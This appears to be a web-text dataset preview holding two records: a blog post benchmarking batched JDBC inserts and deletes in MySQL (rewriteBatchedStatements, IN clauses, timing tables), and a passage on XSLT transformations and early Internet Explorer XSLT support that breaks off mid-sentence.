text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Benchmarking batch JDBC queries One of our services recently started to perform multiple inserts and deletes in MySQL database. To the point of a noticeable response time increase. Batching of SQL queries is nothing new, but I decided to wander around this topic a bit in Internet, and stumbled upon something I never heard before (or blissfully forgot). A rewriteBatchedStatements property of MySQL JDBC driver. Here I am, benchmarking this thing and checking other options… Disclaimer 1. To be honest, this post doesn’t contain anything new or special in it. I’ve just discovered something interesting and would like to share it. Disclaimer 2. This time I haven’t prepared standalone code example, as I did it for a specific task inside of our bazel monorepo using some of our internal tooling. Sorry. But there’s nothing special in those benchmarks. What happened? Initially we used queries like this (all examples are for scalikejdbc but it doesn’t really matter): case class Entity(id: String, val1: String, val2: Boolean, val3: Array[Byte]) def add(entity: Entry): Unit = autoCommit { implicit session => sql""" INSERT INTO tbl (id, col1, col2, col3) VALUES (${entity.id}, ${entity.val1}, ${entity.val2}, ${entity.val3}) """ .update() .apply() } def remove(id: String): Unit = autoCommit { implicit session => sql"""DELETE FROM tbl WHERE id = $id""" .update() .apply() } As system evolved, we started calling those DAO methods in a loop (gotcha!). Eventually number of entities grew, and we got a problem :) Batching Batching is an attempt to reduce number of round-trips from application to a database. So, what driver does is — instead of sending a bunch of separate queries, it sends it this way: INSERT INTO tbl (...) VALUES(...); INSERT INTO tbl (...) VALUES(...); Note the ; at the end of the query. Those are still separate queries, but it's sent as a single request. To code change is not that big: def add(entities: Seq[Entity]): Unit = localTx { implicit session => val params = entities.map { entity => Seq( "id" -> entity.id, "val1" -> entity.val1, "val2" -> entity.val2, "val3" -> entity.val3, ) } sql""" INSERT INTO tbl (id, col1, col2, col3) VALUES ({id}, {val1}, {val2}, {val3}) """ .batchByName(params: _*) .apply() } Similar thing we can do for DELETE: def remove(ids: Seq[String]): Unit = localTx { implicit session => val params = ids.map(v => Seq(v)) sql"""DELETE FROM tbl WHERE id = ?""" .batch(params: _*) .apply() } Better DELETE (IN clause) Actually, for delete we can do much more robust thing: def remove(ids: Seq[String]): Unit = autoCommit { implicit session => val inClause = SQLSyntax.csv(ids.map(id => sqls"""$id"""): _*) sql"""DELETE FROM tbl WHERE id IN ($inClause)""" .update() .apply() } rewriteBatchedStatements I stumbled upon this parameter on StackOverflow and instantly decided to check how it works. Basically, it rewrites INSERT queries in multi-value queries: INSERT INTO tbl (...) VALUES (...), (...), (...) Which makes it slightly more concise (less SQL) and something inside MySQL makes it faster. Benchmarks First, I verified that rewriteBatchedStatements actually works by enabling profile logs in driver, it showed that final queries. Second, I built a very simple benchmark that tests different flavors of batching for INSERT and for DELETE with different number of entries. Each entry in my test is about few hundreds of bytes, multiple columns, nothing fancy. INSERT As you may see in benchmark results below, multi-value INSERT is really the fastest. oneByOne is just a loop outside the DAO. Total time increases linearly (obviously). The problem here is simple -- the number of transactions in MySQL equals to number of rows that we're inserting. And a transaction takes time. Solution to this is to start transaction only once and then make queries in the loop within this transaction. This case represented by oneByOneInTransaction in the table. As you may see, its performance is comparable to a regular batching. Benchmark (numberOfEntities) Mode Cnt Score Error Unitsbatch 1 avgt 2 12.797 ms/op batchRewriting 1 avgt 2 11.769 ms/op oneByOneInTransaction 1 avgt 2 12.624 ms/op oneByOne 1 avgt 2 12.184 ms/opbatch 10 avgt 2 13.433 ms/op batchRewriting 10 avgt 2 11.835 ms/op oneByOneInTransaction 10 avgt 2 15.592 ms/op oneByOne 10 avgt 2 125.161 ms/opbatch 100 avgt 2 29.763 ms/op batchRewriting 100 avgt 2 22.480 ms/op oneByOneInTransaction 100 avgt 2 35.664 ms/op oneByOne 100 avgt 2 1281.417 ms/opbatch 1000 avgt 2 213.938 ms/op batchRewriting 1000 avgt 2 148.009 ms/op oneByOneInTransaction 1000 avgt 2 229.646 ms/opbatch 10000 avgt 2 2027.138 ms/op batchRewriting 10000 avgt 2 1497.429 ms/op oneByOneInTransaction 10000 avgt 2 2321.587 ms/op DELETE In case of DELETE the option rewriteBatchedStatements shouldn't affect anything. However, it's still better than regular batching. As expected, by using IN clause we get the best performance, as it's a single query (just like in case of INSERT with multi-values). Benchmark (numberOfEntities) Mode Cnt Score Error Units batch 1 avgt 2 21.636 ms/op batchRewriting 1 avgt 2 15.237 ms/op inClause 1 avgt 2 13.483 ms/op oneByOneInTransaction 1 avgt 2 10.938 ms/op oneByOne 1 avgt 2 12.273 ms/opbatch 10 avgt 2 16.328 ms/op batchRewriting 10 avgt 2 14.396 ms/op inClause 10 avgt 2 11.184 ms/op oneByOneInTransaction 10 avgt 2 13.085 ms/op oneByOne 10 avgt 2 124.575 ms/opbatch 100 avgt 2 21.893 ms/op batchRewriting 100 avgt 2 17.696 ms/op inClause 100 avgt 2 13.029 ms/op oneByOneInTransaction 100 avgt 2 24.492 ms/op oneByOne 100 avgt 2 1181.656 ms/opbatch 1000 avgt 2 104.244 ms/op batchRewriting 1000 avgt 2 83.070 ms/op inClause 1000 avgt 2 25.444 ms/op oneByOneInTransaction 1000 avgt 2 130.383 ms/opbatch 10000 avgt 2 925.338 ms/op batchRewriting 10000 avgt 2 854.990 ms/op inClause 10000 avgt 2 167.237 ms/op oneByOneInTransaction 10000 avgt 2 1254.676 ms/op Conclusion The way to achieve the best performance with a database is to use the least amount of queries. In case of INSERT it's a multi-value query, in case of DELETE it's an IN clause with multiple identifiers specified. For DELETE queries it's on us to write it properly, and for INSERT queries there is a very nice driver option that converts your batch query into multi-value query and boosts the performance auto-magically!
https://dkomanov.medium.com/benchmarking-batch-jdbc-queries-a2b5911ada26
CC-MAIN-2022-27
refinedweb
1,082
68.97
Web Parts Overview This content is outdated and is no longer being maintained. It is provided as a courtesy for individuals who are still using these technologies. This page may contain URLs that were valid when originally published, but now link to sites or pages that no longer exist. Web Parts are server-side controls that run inside the context of special pages (that is, Web Part Pages) within an ASP.NET application or a Windows SharePoint Services site. They are the "building blocks" of pages in Windows SharePoint Services. Windows SharePoint Services includes built-in Web Parts that you can use as soon as you have installed the product. In addition, you can build your own Web Parts and deploy them to the server. Because of the popularity of Web Parts in Windows SharePoint Services 2.0, support for a new Web Part infrastructure for ASP.NET 2.0 was added to Windows SharePoint Services 3.0. The new Web Part infrastructure is similar yet distinct from the Web Part infrastructure in Windows SharePoint Services 2.0. There are now two different Web Part styles in Windows SharePoint Services 3.0. Both are supported, but the ASP.NET 2.0 Web Part is the recommended style for your new projects. SharePoint-based Web Parts — The older style Web Parts have a dependency on Microsoft.SharePoint.dll and must inherit from the WebPart base class in the Microsoft.SharePoint.WebPartPages namespace. These Web Parts can only be used in SharePoint Web sites. Yet in Windows SharePoint Services 3.0, the Microsoft.SharePoint.dll was changed so that Web Parts written in the older style would be compatible with the Windows SharePoint Services 3.0 runtime. ASP.NET 2.0 Web Parts — These Web Parts are built on top of the ASP.NET Web Part infrastructure. The newer ASP.NET-style Web Parts have a dependency on System.Web.dll and must inherit from a different base class named WebPart in the System.Web.UI.WebControls.WebParts namespace. These Web Parts can be used in Windows SharePoint Services applications whether Windows SharePoint Services is involved or not, making them highly reusable. The Windows SharePoint Services 3.0 Web Part infrastructure is built on top of a control named SPWebPartManager that is derived from the ASP.NET 2.0 WebPartManager control. The SPWebPartManager control overrides the standard behavior of the WebPartManager control to persist Web Part data inside the Windows SharePoint Servicescontent database instead of in the ASP.NET services database. In most cases, you don not have to worry about dealing directly with the SPWebPartManager control because the one and only required instance is already defined in default.master. When you create a content page that links to default.master, the SPWebPartManager control is already there. When you create a Web Part Page for a standard ASP.NET 2.0 application, you need to add logic that interacts with the WebPartManager control to manage the Web Part display mode, and generally you also need to explicitly add editor parts and catalog parts to the page along with the HTML layout to accommodate them. Fortunately, you do not have to perform these changes when creating content pages for a Windows SharePoint Services 3.0 site. Instead, you inherit from the WebPartPage class that is defined inside the Microsoft.SharePoint.WebPartPages namespace and it does all the work behind the scenes for you. For more information about creating ASP.NET Web Parts, see ASP.NET AJAX in Windows SharePoint Services and Web Parts Control Set Overview in the ASP.NET documentation. Custom Web Parts provide developers with a method to create user interface elements that support both customization and personalization. A site owner or a site member with the appropriate permissions can customize Web Part Pages by using a browser or by using Microsoft Office SharePoint Designer 2007 to add, reconfigure, or remove a Web Part. In Windows SharePoint Services 2.0, developers could extend SharePoint sites by creating custom Web Parts, to add the extra dimensions of user customization and personalization. benefit from and use custom Web Parts: Creating custom properties you can display and modify in the user interface. Improving performance and scalability. A compiled custom Web Part runs faster than a script. Implementing proprietary code without disclosing the source code. Securing and controlling access to content within the Web Part. Built-in Web Parts allow any users with appropriate permissions to change content and alter Web Part functionality. With a custom Web Part, you can determine the content or properties to display to users, regardless of their permissions. Making your Web Part connectable, allowing Web Parts to provide or access data from other connectable Web Parts. Interacting with the object models that are exposed in Windows SharePoint Services. For example, you can create a custom Web Part to save documents to a Windows SharePoint Services document library. Controlling the cache for the Web Part by using built-in cache tools. For example, you can use these tools to specify when to read, write, or invalidate the Web Part cache. Benefiting from a rich development environment with debugging features that are provided by tools such as Microsoft Visual Studio 2005. Creating a base class for other Web Parts to extend. For example, to create a collection of Web Parts with similar features and functionality, create a custom base class from which multiple Web Parts can inherit. This reduces the overall cost of developing and testing subsequent Web Parts. Controlling the implementation of the Web Part. For example, you can write a custom server-side Web Part that connects to a back-end database, or you can create a Web Part that is compatible with a broader range of Web browsers.
https://msdn.microsoft.com/en-us/library/office/ms432401(v=office.12)
CC-MAIN-2015-32
refinedweb
959
57.27
Note: The following notes were made during the Workshop or produced from recordings after the Workshop was over. They may contain errors and interested parties should study the video recordings to confirm details. Scribe: Dominic Jones Jose: best practices for MLOD given at last workshop. One pattern is a solution to a problem. Good to have catalog of patterns for selection. Common vocabs. ... best solutions for Multlingual Linked open data ... each pattern has description, example, discussion. ... Patterns have name, dereference, long desc, linkings and refuse factors. Jose: 20 patterns, for community to add to and adapt ... person is an armenian and professor at uni of leon. person has birthplace, postion and worksat ... 1st select a uri scheme. URI is human readable ASCII characters ... another pattern is opaque URIs where local names are not human readable. These are independent from natural language implementation ... These are hard to handle by developers ... So descriptive URIs, Opaque URIs and Full IRIS ... internationalized local names. Domain name is ASCII chars but local name is in local chars Dave LewisSee Jose: another pattern is to include language tag in the URI ... Dereference: return labels based on language code of the user ... semantic equiv of data needs to be identified. ... Labeling - label everything including using multilingual labels. ML labels have a problem when querying looks for mono-lingual labels. ... solutions = labels with no lang tag ... with this which language is the default? Longer descriptions are difficult to handle, better to have finer grained descriptions to separate out labels. ... for longer descriptions there is the possibility of structured literals. ... linking same concepts in different languages which are identified as being the same. However contradictions exist. Link linguistic meta-data exists, 1st class lang annotations. ... reuse: vocabs are generally mono-lingual. Multlingual vocabs are more difficult to maintain ... can create new localized vocabs ... future work - session on best practices for ML LOD, opportunity to improve catalog / add to / remove from catalog Asuncion: all ML concepts should be addressed in LD generation ... model is simple, everything is in rdfs ... subject, property, value. Unique identifiers, URIs are used. Subjects are represented by URIs. ... using equiv links to link data sets ... lots of info sources in different languages. RDF generation and linked data allows for graphical representation of ML LOD sets ... currently looking at million literals data set ... numbers of literals with language tags has increased from 2011 to 2012 ... still mostly in english. Data in other languages are simular. Most data is in English as not many countries are providing LD in languages other than English ... in LD cloud ML queries is achieved through 6 stages. ... 1) specification, how to model data sets. 2) Translate labels of ontology into other languages, align vocabs of other languages. Reuse / align existing vocabs. 3) RDF generation use richer models for applications ... 4) link generation - how to discover cross lingual links - how to represent cross-lingual links - how to store and reuse links. ... concepts are tagged in language-based ontology, these ontologies are linked, cross-lingual links. Properties describe medicine ... ontology in german and spanish, translate german into spanish and check for alignments or use cross-lingual-ontology matching across both ... 5) publication - links can be discovered at run time of offline, some storage method is needed for links already discovered. ... 6) Exploitation how to adapt semantic query to linguistic and cultural background of a user. Also how should results of semantic query be adapted. ... For ML LOD many services need to exist from generation through to consumption - ML LOD should be provided through service translation but now we should start including lang features in the generation of data Peter: Large repository for public linked open data ... publications office of EU is a publisher of EU institutions, legislations and non-legislation documents. Whole process of document management. Finally moving from paper to electronic model and from publisher to data provider ... shift from paper to electronic makes the electronic version of EU journal legally binding. ... Multilingualism is core, 23 languages used. Every EU member state requires publication in their own language. For example 2600 pages per document * 23 langs ... ML supports all member states equally therefore ML public websites must exist. For Law, procurement, CORDIS and general publication bookshop. ... Four systems for the ML semantic web ... CELLAR, EU Data Portal, Eurovoc, MDR ... 1) CELLAR in currently production, not yet public, being loaded / populated, some key concepts - repos is defined by common data model (ontology). Semantic model is built up by these components. Loading is standardized, 30TB of data ... in repos content is stored in top level, meta-data is linked to this. Distribution side and SPARQL end point. ... 700M triples in the store. Mainly PDF, XML and XHTML. ... accessible through RESTFul API or through SPARQL endpoint ... 2) EU Data Portal. Single point of access to all structured data for linking and reuse of commercial and non-commercial data Peter: RDF based interface for upload of meta-data ... 3) EUROVOC available in SKOS/RDF or XML format. 4) Meta-data Registry (MDR) for concepts which have been validated they are published through CELLAR, Controlled vocabs etc 5) For english all the languages of the EU are presented, translations are discussed between all units in the EU and therefore official translation (by member states) exist scribe: European Legislation Identifier (ELI) follows W3C RDF / XML to provide data in standardized way. Gordon: IFLA body which maintains global standards for library and biblio environment. ... Separate to IFLA is ISBD and UNIMARC all three relate to library / biblio standards, ... all three use internationally. ... IFLA has own namespace for standards. Supports conversion from library linked data without loss of information. ... IFLA has 7 languages. Standards generally written in English and then translated into the 7 languages. ... ML website launched in spanish, partial doc in spanish of what exists in spanish already. ... Open meta data reg is used to store classes, URIs for each maintainers. These are Opaque as to avoid lang bias when used in RDF ... ISBD elements - problems occurred when namespace was translated. Translation into spanish became guidelines for doing future translations. Contains much info on the problems / issues of translations. ... Problems 1) scope, what is translated first and what is most useful. (developers - element definitions, labels) (Users - what they see labels of concepts in value vocabs). ... 2) Style: Verbal phrasing, CamelCasing etc ... hasAuthor, hasTitle does not translate perfectly into other languages. CamelCasing looks bad in other languages, whats ok in one language may not work in another language. 3) Disambig methods for creating labels may vary between languages. 4) Language Inflection Partial translations only preferred label translated, have to track status of translation through a number of stages, schedules and status tracking are required. ... MulDiCat for authoritative translations of IFLA standards, available in open meta-data repository as well. More than 26 langs represented. Thierry: on the web ML pages, dictionaries, tools. not every document is available in every language. When I access web in german or french I dont often get docs in other languages. Mono-lingual search ... semantic resources are already available on the web. We have ML web, pages, resources but we want the Sem Web to run in combination with lang tech so we can annotate text ... GICS - classIDs, Labels, these labels use non-standard formats etc. ... towards ML linguistic Semantic Web so labels can be encoded in RDF using Lemon model - also want to mention Linguistic Linked Open Data. ... annotate text available in multiple languages 1) take all labels, analyze, combine in semantic repos using Lemon and apply to running annotated text. Can also be stored in queryable tool. ... in one ontology you display suggestion for ML labels encoded in ontology ... NooJ can be used to test NLP analysis of labels, difference is way natural langage can be expressed ... need to harmonise and modify a label for NLP. Terminological expansion of labels provide taxonomies for preferred labels. From 1 label 5 labels can be generated annotated using LEMON and exported ... triggering of ellipsis resolution to cross-lingual labels in other languages. Labels are expanded based on property of another language. ... From this we discovered semantic annotation of web documents in many languages. ... Text from spanish stock market, two simular taxonomy generates two annotations, both labels point to same concept but are textually different. ... labels can be displayed in many other languages and allows for annotations in higher level languages. ... needs to make sure these are compliant in terms of standardisation. lmatteis: What's the reason behind having 'opaque' URIs, and translating RDF predicates? They are merely identifiers, and as long as 'label' and 'definitions' have been properly translated, I see no reason of further complicating RDF vocabularies with multiple translations. Gordon: Several reasons for opaque URIs. 1) Not opaque must be based on something, therefore is the label changes the URI cant change so its more confusing. 2) The favoring of any language over another is not good practice. 3) When translating property and class labels we're using opaque URIs Ivan: Linked Data community doesn't know "anything" you guys are doing. Until Larger LD community is aware of your work I dont see anything changing. For devs to take ML LD into account they need to be aware of your work Asuncion: Ontology-Lexical WG is being proposed to be used for representing. Big countries investing in LD are english speaking and are not immediately interested in ML LD. Asuncion: From SW perspective we need a road-map to push these ML issues. White Paper for community addressing these issues. Ivan: W3C working groups are not suited for this. For example schema.org represents vocabs that are used we cant ignore them. Need to try to get the authors of schema.org to think about ML data ... labeling and documentation in ML form would be a huge step Jose: I agree with your point, hence catalog of patterns has been produced. ... need to educate hence BP practices for ML LOD Asuncion: Trying to analyze how languages are used and how these linguistic choices are applied to data sets chaals: annotating other peoples vocabs are socially difficult. Opaque URIs avoid having a language bias? No, the bias exists in the model, opaque URIs hide this from the top level view. We should be publishing annotations on other peoples vocabs that are broken jose: in the case of annotating and translating the label that you want. ... labelsforall.info simular to prefix.cc for label and translation recording. Q: Different communities I second Ivan’s views. In terms of ML-LOD cloud, when someone asks where is ML-ism? A URI is a resource that can be in many languages. Dimensions, Peter S takes of TB of LOD. Many people talk in terms of one record. In ML-LOD 1) concept Richard Ishida: Aim of workshop is not just for talks but to get people together networking to move things forward. christian Lieske: 2 things 1- how far does the work you are driving / continuing, effect the content authors. user cataloging, etc. Also how far is the reviewing activity considered a general reviewers toolkit Peter: no direct connections to author services, everything is translated, we're just proof reading. IN being efficient we work with coded data and cataloging. Thierry: our work has implication on labels, taxonomies, in terms of impact important we provide impact to provide recommendation to change terminology to make it more applicable. q: relation between work of the speakers and repositories like free-base? Feiyu: instance of freebase can be used as a kind of interlingual can be really useful for ML-LOD Scribe: Phil Ritchie Pat Kane: focus on end users ... Users want to use their own scripts ... growth in Asia Pacific driving non-English domain names and urls ... 1m+ international domain names registered in first six months ... 50% cjk ideographs ... Armenian scripts under-served ... major browsers handle idm's quite well ... email addresses used a lot as identifiers in log in's ... What's hindering domain registrations? greater user awareness, registrar's ... better mobile browser support, management tools ... results in a lack of trust (intent for a user to register) ... users want full idn support ... lack of ubiquity an issue ... idn's are second class domains, users are suspicious of them ... not comfortable with idn.ascii ... SME's in China are more open to idn.idn ... 5 key insights: more utility needed, initial resistance to adoption, translation preferences, ... moderate interest in registration and registrar channel expectations. ... Chinese want idn.idn not idn.ascii ... In India respondents do not visit idn.idn ... In Japan comfortable with ascii.ascii ... Korea more passionate about idn.idn ... Need multi-disciplinary groups to push adoption ... Key roles: Registries, Registrar's, content creators, application developers, Governments and businesses ... and standards organisations ... circle of dependency: adoption -- ubiquity ... change ecosystem to enhance user experience ... ubiquity drives trust ... ubiquity means not just desktop but also mobile ... mobile applications are much less capable of handling IDN's Richard Ishida: concerned about data and data formats: specifically people's names ... web sites usually ask for "first" and "last"name ... Use "given" and "family" name ... names are more complicated than we generally think ... applications want to parse names and do things with them - e.g. in salutations, search and sorting ... Björk's "surname" is actually her father's name ... "bin" == son of ... Mao Ze Dong - Ze == generational name ... How you would address him depends on a lot of things ... typically he would use a western name to make things easier for western people ... multiple family names: given name plus two family names ... father's name first, mother's name second - varies by country ... Variant word forms indicating gender ... how names are inherited varies ... nicknames used often to help ... written forms can be ambiguous ... many asian names can be transcribed identically ... Recommendation: ask people how you would like to be addressed ... this topic needs a lot more work ... need an authoritative guidance on the problems of handling names Sebastian: LOD == Linked Open Data cloud ... data sets published on the net ... free, open and open licensed sebastian going through the lod2 stack ... now about NIF format ... linguistic LOD cloud ... in NIF use fragment identifiers to address primary data ... can query NIF components as a web service ... OLiA: Vocabulary Module - mapping of over 50 Tagsets ... NIF 2.0 plans - links to ITS 2.0, Lemon ontology, XPath uri scheme ... NIF will be free and open ... looking for contributors Fernando: FAO has presence in 82 country offices ... uses 6 official EU languages ... FAO users language primarily English followed by Spanish and French ... currently reorganizing content to focus on decentralization and partnerships ... need to accommodate locally generated content ... Issues faced: a lot of unstructured content, web content, language versions do not match, no localized uri's, low reuse of content ... lack of mono- and multilingual ontologies to drive navigation ... do have a stable geopolitical ontology ... need to make best use of existing content, identify normative, use CMS-independent content, use MT (for Arabic and Chinese), better (intended) understand users ... want to utilize standards and best practices: XLIFF, RDF, ITS 2.0, learn from translation workflows, get social - on-demand translation ... allow users to vote for pages that should be translated ... have a set of short term and more longer term goals ... want to prioritize for Chinese, Russian, etc. Paula: McKinsey - "Strong multinationals seem less healthy..." ... Local firms in emerging markets succeed where Multinationals fail ... Marketing defined as a key function ... global means complexity which means cost ... balance central vs local ... The Consumer Decision Journey ... written about in the Harvard Business Review ... many people in the digital age already know what they want to buy before they go to purchase it. ... consumers in the digital age trust social marketing ... push branding is irrelevant in the digital age ... so how do you form your pre-purchase opinion? Search ... changing the rules: The Global Customer Lifecycle ... 71% decide based on in-language search and peer recommendations ... 3 Biggest Problems: Traffic, Conversions, Management ... when search is bad: "Can't find... won't buy" ... Web Localization Maturity Model ... SEO localization generates 15-40% more traffic ... increase search rankings and traffic ... be in the top 3 search results by benchmarking against competitors ... SEO optimized translations is an iterative process ... look at baseline, keyword research, translation, QA, repeat ... percolate keywords throughout content ... analytics and reporting against competitors ... it's not just Google. 6/10 popular social networks in China. ... Yandex expanding out of Russia ... pace of change is accelerating ... global companies need to be hyper-local. ... utilize local search term experts ... Long Tail of search terms ... Methods for executing multi-lingual Pay Per Click: MT, Local Offices, Human Translation, Localization and Optimisation ... hosting 1.5 million pages for clients Reinhard Schaler: existing notion of "give up the illusion of control". ... What is stopping the localization industry from handing over to the users? Paula Shannon: Localization is the step-child. No clear ROI. Localization has been a cost center thus focused on efficiency and cost reduction Des Oates: Some companies are making steps to user empowerment ... Adobe has ceded control of certain products to users Paula Shannon: text enrichment can help Fernando Serván: monitor demand, traffic analytics ... demand to drive translation Charles: when you prioritize translation on demand, how do you decide? ... how do you balance those things? ... your goal is to server existing users Fernando: it is tricky, I agree but we are trying to understand users better ... time will tell Richard Ishida: In India most people are used to ascii.ascii. Yet small percentage of users speak English ... should the market for IDNs be bigger? Pat Kane: the biggest challenge is the number of languages and scripts ???: Globalization vs Localization vs Multiculturalism ... we ignore the multicultural component ... Fernando mentioned using MT for Arabic and Chinese ... these are difficult MT languages, do you have specific reasons for using MT for these languages? Fernando: we know Spanish and French are easier ... it is difficult to find the volume of translators for Chinese and Arabic ... SDL: it's important to consider user feedback Scribe: Dave Lewis Des Oates: International domain names, chaired by pat kane ... best practice in multilingual linked open data - chaired dom jones ... translation quality - chaired by arle lommel ... from floor ... interest in translation quality on postediting as well as human translation des: the ball is now over to audience to propose now other topics ... aim is the not just discuss but to propose action plans to deliver upon later ... some personal finding from workshop to date ... input from content creators, advances using ITS2.0 from cocomore, also with joomla and use with xliff in drupal and dita ... also real world use cases with spanish tax office ... the other big topic is multilingual search and ML SEO, including insights from Paula ... a big issue for adobe related to keyword and term management Working doc at: Ivan: Community needs more deployment, use cases, data and linked data ... Underlying tech needs to be seen as stable, so people are not waiting for next big thing, so W3C is not planning anything more to stack ... W3C won’t standardise things, but will rely on community groups, e.g. Open Annotation CG ... W3C want to extend this and perhaps host vocabs with stable URIs, with registry of meta-data. Not a value measure, just cataloguing meta-data and governance and version control of vocab – will include localisation quality ... Need better validation, RDF is not well suited to this, so need structural validation (schema-like) and quality validation – but how to validate a multilingual vocab – a question for this vocab ... Disconnect between LOD and non-LOD , e,g CSV, text files etc. We site developer use data, not linked data ... Reference London Open Data on the Web workshop Gordon: IFLA – similar to earlier presentation in plenary session ... Have a few trillion triples potentially, a large high quality collection ... Some translated, some not, and partial translations ... Have a ML dictionary for authoritative publication of pub categories, but not very accessible to end users or web developers Jose: Practical ML LOD guidelines ... Naming guidelines: extrapolated from mono lingual guidelines ... Opaque URI raises some controversy Chaas: Tools need to be good ... Opaque URI not helpful ... Yandex is in schema.org, but only look at microdata rather than rdfa because it was easier, but now might be regretting this and rdfa might be better. But because of this, in Russia microdata is more common than microdata. ... At yandex, people tend to add label/meta-data in English, but it was a better process to do it in Russian – on the whole you perform better in your own English. Roberto: BabelNet – wide ML semantic network, with encyclopedic and lexicographic from Wikipedia and Wordnet ... ... 6 languages cover, moving to 40+ ... 3 million synsets ... Planning to integrate babelnet into linguistic linked open data cloud ... Contribution to LOD: Make available in lemon, real large ML LOD example Haofen: apex labs, china– data and knowledge management labs ... ... Chinese LOD (CLOD) – 8 million instances, 1 billion triples, Chinese wikipedia, baike.com and baidu encyclopedia site ... Issues: need to use IRI, but limited by use of older browsers ... Naming resources, Wikipedia uses traditional Chinese rather than simplified Chinese ... Integrating with e-commerce sites 360buy, taobao and soc net weibo and dianping to motivate more open LOD data streams ... Align with schema.org Jose: ... Notes taken on google docs. ... Naming: descriptive vs opaque, depends on the use case, useful for both ... Labeling: should always have language tag ... Interlinks: sameAs and see also may not be useful in all cases, lexical/linguistic resource interlinking not always the same as conceptual interlinking ... Will start community group on best practice in ML LOD ... Richard Ishida notes this is easy to set up and join Arle: Need to decouple production method from end use ... Source quality is an issue, not always the translators fault ... Quality is dependent on the step in workflow where it is used ... Expectation need to be clear ... Are existing metrics actually valid and reproducible? Some are academic and not useful for production ... Need some process metrics to track these. Ethnographic studies of posteditors. ... Additional factors, see slides. ... So what does multilingual web do to help, three points: ... (1) Context, audience and use – common methods for HT, MT and PR MT – but need to be broadened out beyondQT Launchpad (wee workshop tomorrow) ... (2) Don’t reinvent the wheel, harmonise parallel work ... (3) An ongoing effort needed perhaps centered on MLW community at W3C Pat: It is an ecosystem problems, not just for W3C but other bodies, other voices needed also. ... Perhaps w3C working group could be a starting point David: CMS-L10n roundtrip, term management, and harmonisation efforts ... Seemed to cover many issues in existing ITS2.0-XLIFF mapping, e.g. terminology (usage and forbidden) ... But do need some standardized API, connectors and brokers ... In terminology need a message broker. Especially in interactive scenario with multiple terminology systems in real time. Juan Pane: Focus on 3 use cases: ... 1) Recognition, e.g. named entity recognition and resolution, focussed on person names, for MT, for search and also segmentation (over line boundaries) ... 2) Display: sorting names in lists. Contextual usage – formal, familial, full (postal), autocompletion, abbreviation (e.g. in paper author list), text to speech ... 3) Capturing names: transliteration, speech to text, input form – size, order labels ... Problems listed ... Propose perhaps define an ontology of names Reinhard: Discussed different scenarios, e.g. for commercial and for non-market/non-profit, people motivation and associated support systems ... Practical implementations: environments need to be easy to use, looking at Easyling, FAO and SOLAS ... Too few to set up a bigger group, but invite other to participate. Christian Lieske: why do we need an additional terminology related standard, can’t we reuse existing LOD mechanisms? David Filip: agrees that linked data can helps but need specific support for terminology. This area also suffers from many poorly adopted standards so a new one might make sense. Christian Lieske: good to bring LOD, terminology communities together David Filip: agrees, standards harmonisation is key to going forward. But also there is a gap in the API level Felix: looks for more standardisation people and localisation companies in the ML LOD best practice group. Des: supports this call ... asks about CMIS David Filip: yes, work Pedro: we are going to GALA, so if there is a clear message we will Ioannis: also visiting a industrial term working Dave:let’s open group now, so we have a concrete URL to point people at Christian Lieske: how will names discussion advance? Richard: no specific plans David Filip: asks about locatives in names Richard: not addressed this yet, as there were more immediate use cases, nor inflection, or other context Dave: asks if I18n interest group is a good place for this Richard: community group can be more focussed, IG may reach more people but interest can be more focussed Felix: agree we need to think about where best to place this. But in all cases we need hero to drive it forward – the ML-LOD BP seems to have two to three Richard: +1 need committed driving person Des: wrap up there, thanks everyone Arle: Slides will be available soon, by next week. Linked from programme page ... There is streaming video available already provided by FAO, and better quality lectures available from Video Lectures ... Report will be produced soon, based on scribes ... Thanks to sponsors, Verisign who support workshop and dinner, and QTLaunchpad, who will having, FAO for local support, DFKI and Nieves, and Felix. Thanks to EC and their sponsorships, W3C for logistical home, programme committee, organizing group, speakers, chairs and scribe (especially Felix). ... Funding for conference series comes from MLW-LT which finished end of year. Waiting to hear on further funding from EU projects, but if anyone has further opportunities for funding or is willing to host future events please talk to Felix or Arle.
http://www.w3.org/International/multilingualweb/rome/IRC/13-mlwrome-irc.html
CC-MAIN-2019-22
refinedweb
4,317
60.21
Transformations are an idea as old as human thought. Primitive societies had werewolves, werebears, and weretigers. The Greeks had warnings against seeing goddesses bathe, unless one was interested in going to parties stag, literally. During the renaissance, there was Shakespeare's A Midsummer's Night Dream, in which Bottom was made an Ass of. Today we have Jack Chalker's Midnight at the Well of Souls and the Borg from Star Trek. And although the transformations in each of these stories dealt with the physical world and XSLT can affect only XML, they all share many of the same characteristics: Without change, the story can progress no further. As one who has been working in the programming field for a number of years, I can attest to one thing: About 40 percent of the time, the data is in the wrong format. In ancient times, when great beasts with names such as System major problem. Programs had to be changed or written from scratch to massage the data to make it usable. Changing programs and creating programs has always been a costly undertaking in any day and age. Now things are different, as time seems to be speeding up. The great beasts are all either dead or behind glass in museums, where people can stare in awe, never realizing that the old 486 machine that they gave to their kids had more power. Today much of the information that we deal with is in the form of XML, which, interestingly enough, can be transformed by XSLT in much the same manner as Lon Chaney was by the full moon. Thankfully, however, the XML doesn't get hairyunless, of course, we want it to. Here's the quandary: On the client side, we have XML and we want HTML. It's a real pain in the gluteus, isn't it? Yes, we can write a script to perform the conversion, but it is a time-consuming task accomplished with ill-suited tools. Face it: The majority of scripting languages aren't really built to handle XML. Although it works just fine, when messing around with individual nodes, JavaScript's XML support comes across like a Bose sound system in a Ford Pinto. I'm not saying that it doesn't workit works just fine, but, unfortunately, six months later it has a tendency to cause questions like, "I wrote this?" XSLT, as opposed to JavaScript, was designed from the ground up to handle XML. Come to think of it, XSLT is itself a dialect of XML. This has a tendency to lead to some really interesting style sheets when working with XSLT, but that is a topic for another day. Another interesting thing is that although the input has to be XML, nothing says that the output needs to be XML. This means that if you want to transform XML into HTML as opposed to XHTML, by all means do it, but just remember that if you're using SOAP, the package must be well formed. Back in the old days, during the first browser wars, Microsoft released Internet Explorer version 5.0, the first web browser with XSLT support. It would have been a major victory for Microsoft, if it had not been for one little detail. In their haste, they forgot one little thing about the World Wide Web Consortium's recommendations. You see, recommendations are often vastly different from drafts. In an effort to produce the first browser with XSLT support, Microsoft used a draft as a guide. For this reason, you sometimes see references to the namespace instead of. It was only with the advent of Microsoft Internet Explorer 6 that Internet Explorer started following the recommendation instead of the draft. Personally, I believe that it is a good idea to ignore the old namespace entirely; I think that Microsoft would like to. And although they're currently considered the third most popular browser, at most, individuals using versions 5.0, 5.01, and 5.5 of Internet Explorer comprise only 